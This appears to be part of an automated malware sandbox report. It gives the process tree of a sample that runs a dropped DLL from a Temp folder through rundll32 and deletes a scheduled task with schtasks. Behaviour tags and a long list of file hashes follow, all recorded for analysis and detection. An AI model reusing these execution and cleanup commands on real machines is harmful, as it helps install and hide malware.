C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\yqVNydvJdnVKJAcs\BTvvLXHC\sGFcpld.dll",#1 /oEsite_idgUE 3851181⤵PID:3656
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\yqVNydvJdnVKJAcs\BTvvLXHC\sGFcpld.dll",#1 /oEsite_idgUE 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1156 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "LziCoayHjbgPwuIox"3⤵PID:4316
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD54dfe74a92de4fe6597fcb9de4d0f1ce0
SHA17b845dd98f5e87d86f2b5eb51d1b408910a4b971
SHA256e02ccd14ddf3d99790dd5f01ee79f04710159b8fcc0161ce54893f7097de39e8
SHA512d84f6046a87cc47cbe36a0031395ea7e94a219270414b91bd9552deb8c58941983551a2354fb4ecb65bbbe4307e87a113335ad7a1d78b81dd3b896abcb8fffd5
-
Filesize
2KB
MD561e6a0757d9923b0134e943c181daec5
SHA15ef5c7ac085b89cdcc1e70a6739c864e180418a0
SHA256c685eb0a3320bca922222b4aaa4c5f9580a05b7fe074ba4ac67eb220c584bfa6
SHA5127c41209476a128f6b5151626c87a91390cab8868fde34e1c10dfb002b01743b1d58368c148add13cc978370ceedd964dd5d9ff99af9e5c51f397f4414c336b8f
-
Filesize
2KB
MD52d19d61f9ffec0531b6aae01c51e612a
SHA180357a14626c9bd27ab5219628a733dd5ad00b59
SHA2568ce9cda05bd6f05049d82ef153dbf134f2e83d3105015584d0aa049e9e9706d6
SHA51202fa1baebf89b978c93d87ef98897d33f06fc1f509421e03b8f80c20f06817e715d05004a929578e2c2f897854d875c5721e3ee5bf840fbfaa9463c8d8b6fea5
-
Filesize
2KB
MD5d3618128a9b65b64d359d5b2a1152648
SHA15b20001a30ba4ad7f1d5797cfb515d1de7cf4897
SHA2565dd751d43839b27ec9da22285bd08858077b15a8cb3bd8525549d6e18d4f0f0d
SHA512cd38c0b076b2b01f0e8e0782e06f3466197110ce1950aac29bf21bb8efbfbcb0aca3c3d4e3f95ed258b7f421283893b7860d607281e1937daa9aa1855b70c347
-
Filesize
1.1MB
MD5e5c2ac005dda62516a2a93091a1c5bf7
SHA101babce33f8b996ad1f923d03af013658bb46edb
SHA2568234712558e2ae4ec47234ec8d58642cdc828a83ed07873cab096658066cc6d3
SHA5128573f06fa721cecc6dbb86fd2a305de8a867f5d478c515f2ca441ac3342a54018168e8e45715f6bee8953fc84024eb049d117c0b27687d36b65a396fe6d33b15
-
Filesize
2KB
MD516c7b3d037d52949e2d06ece32193da3
SHA13b1ade158064ebdf37911b573e8d837bb15c827b
SHA256aa7f4ca7593b4d5b8a1c86bcb0ae16ce0ad80bf5b180aa71a7a466b733e795b7
SHA5122799f0e00d6fbaf11aabfe47444ae2b0b26dba1f7dfbfef4ce17f5b3808241d14553e6c1833ee6f6f14d9e215798db4f0315302f17b260e39d89f1cb83e35316
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5964963b8466370bef85b58206380ed6e
SHA1b1ec50be315e51d93b0f40a2b364a2a7cf899b34
SHA256f828f9b07254b7194435ee30c71d2a470d4cb3264d5b5714067664c225033510
SHA5126d435d697dd02831d0004564b230a8bda72ab4b31d4fe240ae5ca8b3a2728e67fd5be66e24e861cd99f4590d74f296bb3145417b9376005d9d6f5192699643c6
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
9KB
MD53d11d1e03b5682476ef7c5f1bccb0898
SHA181f2527c12d5efb97f09c8eb1a917253b2e6e4cf
SHA256628fcf052aeccf308b5d8e4c19466066ef4d4ebdd82b071c2cabedf12fe52a6b
SHA512f2c7ab9f37d67448b6b43ec9fed84a58413dca7de37fecb35fc6fcf1a0bec7dca45069fc46fda6fb529cc98b8a40f234e288436dac45016b0474205d653e4ed8
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
6.1MB
MD5e3000d1068ec46da9602efcb9fab977f
SHA14ac6f9ca64f8dc0e70a21a50bfa2e4f0be57edd1
SHA2569055dc08e5572e0145821a8e97202ae01fd44b0f01cceb2bb37e6eb94191f05e
SHA51240efb34e33b45b8fada05d850ee6933b374f70d5066e583cf6ad8e86057b031530d6ca3a82162de3d496cb66eb899534966db7c0fa299766bf80c180f750e2ac
-
Filesize
6.1MB
MD5e3000d1068ec46da9602efcb9fab977f
SHA14ac6f9ca64f8dc0e70a21a50bfa2e4f0be57edd1
SHA2569055dc08e5572e0145821a8e97202ae01fd44b0f01cceb2bb37e6eb94191f05e
SHA51240efb34e33b45b8fada05d850ee6933b374f70d5066e583cf6ad8e86057b031530d6ca3a82162de3d496cb66eb899534966db7c0fa299766bf80c180f750e2ac
-
Filesize
6.9MB
MD58d977388d6dd1afff73b2470abd0b32f
SHA16c46d839fcb89f342887c71d1d0fecfdd71b4dc8
SHA256b87a7fe530c88043902423e9a7143a0d98aea9217712c3f8125da4e64552d13b
SHA5124169c575067c2be67804026d909eded4d7358f0c898f4117500b9357ce7c576b105af718b3b80ba73443d0a7213a9acc197339b2c65e6e848b19d2f851009ced
-
Filesize
6.9MB
MD58d977388d6dd1afff73b2470abd0b32f
SHA16c46d839fcb89f342887c71d1d0fecfdd71b4dc8
SHA256b87a7fe530c88043902423e9a7143a0d98aea9217712c3f8125da4e64552d13b
SHA5124169c575067c2be67804026d909eded4d7358f0c898f4117500b9357ce7c576b105af718b3b80ba73443d0a7213a9acc197339b2c65e6e848b19d2f851009ced
-
Filesize
6.9MB
MD58d977388d6dd1afff73b2470abd0b32f
SHA16c46d839fcb89f342887c71d1d0fecfdd71b4dc8
SHA256b87a7fe530c88043902423e9a7143a0d98aea9217712c3f8125da4e64552d13b
SHA5124169c575067c2be67804026d909eded4d7358f0c898f4117500b9357ce7c576b105af718b3b80ba73443d0a7213a9acc197339b2c65e6e848b19d2f851009ced
-
Filesize
6.9MB
MD58d977388d6dd1afff73b2470abd0b32f
SHA16c46d839fcb89f342887c71d1d0fecfdd71b4dc8
SHA256b87a7fe530c88043902423e9a7143a0d98aea9217712c3f8125da4e64552d13b
SHA5124169c575067c2be67804026d909eded4d7358f0c898f4117500b9357ce7c576b105af718b3b80ba73443d0a7213a9acc197339b2c65e6e848b19d2f851009ced
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
7KB
MD5af7cd42f8140652d5b444364f658f2ff
SHA16d7a2e71e3c4afec946341a129233c9c96662277
SHA2569f53d67859510defc687c9e0ea1b6e99b2d36fa69ef0e29ab227a7d107c89717
SHA512646552d276621abdd4e5ba6ce6a4d3b91019f345ad090b99e200a3de7b401f13a2b5fd890c902d3174bc5735a9ce3f8ad6c592e9efe5ecbcfa859497272d7e17
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5fab60c0a11b4a74ed52953b51225aa51
SHA15a2bbaf9168f2a0f95caacacb538eb6b7c84138d
SHA2563fae5cafd73a6c07898233fff336f37c15999e2c14e1852db2606d0283c0bc63
SHA5125e77ba8c8e5bbfb1252ae2da25b3bb1025982b95849bd9af8c7bd7a5b4a7583a02a31b7ae21f15ac6bd34f000cc5149796b44da918ec5c0ef24c24a2a50afd46
-
Filesize
6.1MB
MD59fb528065da88932f735573ea50ce98f
SHA143224413e8c10b4c2ba77fd42380b3f4e37c1006
SHA2562d7852281ca98ca615db32e6b54a6800a33a058c259f37db0eefdf99b543898a
SHA512e1f1fb46cae8b28b95ec03b3552fdd52f2b675d4901f4b03f7238960b12eeec97acf9b48ba7f813c1def2e4de45f28b75291d5a911c4946fbea16af82e361171
-
Filesize
6.1MB
MD59fb528065da88932f735573ea50ce98f
SHA143224413e8c10b4c2ba77fd42380b3f4e37c1006
SHA2562d7852281ca98ca615db32e6b54a6800a33a058c259f37db0eefdf99b543898a
SHA512e1f1fb46cae8b28b95ec03b3552fdd52f2b675d4901f4b03f7238960b12eeec97acf9b48ba7f813c1def2e4de45f28b75291d5a911c4946fbea16af82e361171
-
Filesize
6.9MB
MD58d977388d6dd1afff73b2470abd0b32f
SHA16c46d839fcb89f342887c71d1d0fecfdd71b4dc8
SHA256b87a7fe530c88043902423e9a7143a0d98aea9217712c3f8125da4e64552d13b
SHA5124169c575067c2be67804026d909eded4d7358f0c898f4117500b9357ce7c576b105af718b3b80ba73443d0a7213a9acc197339b2c65e6e848b19d2f851009ced
-
Filesize
6.9MB
MD58d977388d6dd1afff73b2470abd0b32f
SHA16c46d839fcb89f342887c71d1d0fecfdd71b4dc8
SHA256b87a7fe530c88043902423e9a7143a0d98aea9217712c3f8125da4e64552d13b
SHA5124169c575067c2be67804026d909eded4d7358f0c898f4117500b9357ce7c576b105af718b3b80ba73443d0a7213a9acc197339b2c65e6e848b19d2f851009ced
-
Filesize
6.9MB
MD58d977388d6dd1afff73b2470abd0b32f
SHA16c46d839fcb89f342887c71d1d0fecfdd71b4dc8
SHA256b87a7fe530c88043902423e9a7143a0d98aea9217712c3f8125da4e64552d13b
SHA5124169c575067c2be67804026d909eded4d7358f0c898f4117500b9357ce7c576b105af718b3b80ba73443d0a7213a9acc197339b2c65e6e848b19d2f851009ced
-
Filesize
6KB
MD584b867fa1b7b64eb8fcbbce96f2b3682
SHA198c6cf2f0073bd95c0fc4e4f5b76a04c10deee99
SHA25648ce24736557a7919d92511c47db486571bfc8329589246de3779da88738b7fb
SHA512bb4df51d4e394e8663f02e0a828b3a94d8a1d96fb2d9ec16a38b467e1a3f977387f2763e8a30de7bc5f6d5601f82793e7bcda11cb5f0882907c7466d37ab8b7f
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732